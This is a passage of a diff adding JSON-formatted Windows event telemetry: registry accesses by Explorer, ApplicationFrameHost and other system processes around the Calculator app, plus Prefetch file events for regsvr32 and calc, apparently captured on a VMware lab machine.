"timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", + "registry_value": "ButtonPressedBackgroundColor", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", + "registry_value": "ButtonPressedForegroundColor", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", + "registry_value": "ButtonBackgroundColorInactive", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", + "registry_value": "ButtonForegroundColorInactive", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883573248700016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883573248860000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883573248860000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883573248860000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", + "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", + "timestamp": 131883573249009984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3\\ShowInSwitchers", + "registry_value": "ShowInSwitchers", + "timestamp": 131883573249009984, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", + "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", + "timestamp": 131883573249170000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+3\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883573249170000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573249330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573249330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573249330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 5824, + "process_name": "SearchIndexer.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", + "registry_value": "NewClientID", + "timestamp": 131883573249330000, + "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", + "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", + "timestamp": 131883573249330000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ImmersiveShell\\PersistedApplicationData\\Volatile", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ImmersiveShell\\PersistedApplicationData\\Volatile\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249480000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "file", + "file_name": "REGSVR32.EXE-55A4EE79.pf", + "file_path": "C:\\Windows\\Prefetch\\REGSVR32.EXE-55A4EE79.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573249640000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "REGSVR32.EXE-A65A209D.pf", + "file_path": "C:\\Windows\\Prefetch\\REGSVR32.EXE-A65A209D.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573249640000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "CALC.EXE-AC08706A.pf", + "file_path": "C:\\Windows\\Prefetch\\CALC.EXE-AC08706A.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573249640000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", + "registry_value": "ButtonBackgroundColor", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", + "registry_value": "ButtonForegroundColor", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", + "registry_value": "ButtonHoverBackgroundColor", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", + "registry_value": "ButtonHoverForegroundColor", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", + "registry_value": "ButtonPressedBackgroundColor", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", + "registry_value": "ButtonPressedForegroundColor", + "timestamp": 131883573249800000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573249800000, + "unique_pid": 